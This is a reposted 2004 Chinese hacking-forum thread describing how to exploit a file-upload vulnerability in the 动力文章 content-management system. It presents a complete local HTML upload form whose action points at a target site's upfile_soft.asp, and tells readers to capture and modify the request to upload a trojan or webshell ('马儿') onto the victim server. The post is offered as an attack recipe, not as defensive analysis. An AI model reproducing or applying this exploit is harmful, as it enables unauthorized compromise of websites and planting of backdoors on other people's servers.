[转载]动力文章上传漏洞的本地利用

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6819
精华: 834
积分: 36070
阅读权限: 255
性别: 男
来自: 中国
在线时间: 586 小时
注册时间: 2004-6-25
最后登录: 2008-9-2

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-10-2 15:18 只看该作者

[转载]动力文章上传漏洞的本地利用

信息来源：华夏

最近盛行动力文章上传漏洞，不少网站纷纷关闭了上传功能，但一些网站并没有删除上传文件：upfile_soft.asp

这就给本地利用创造了机会，我们可以在本地构造一个上传页面，将上传地址直接指向网站的upfile_soft.asp文件。

构造的本地upfile.htm源程序如下：

复制内容到剪贴板

代码:

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<style type="text/css">

<!--

BODY{

BACKGROUND-COLOR: #E1F4EE;

font-size:9pt

}

.tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}

-->

</style>



</head>

<body leftmargin="0" topmargin="0">

<form action="[url]http://www.xxx.com/upfile_soft.asp[/url]" method="post" name="form1" enctype="multipart/form-data">

<input name="FileName" type="FILE" class="tx1" size="40">

<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">

</form>

</body>

</html>

修改代码中相应的页面地址我们就可以重新进行上传抓包，继而上传我们的马儿！

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » 脚本安全[ Web Application ] » [转载]动力文章上传漏洞的本地利用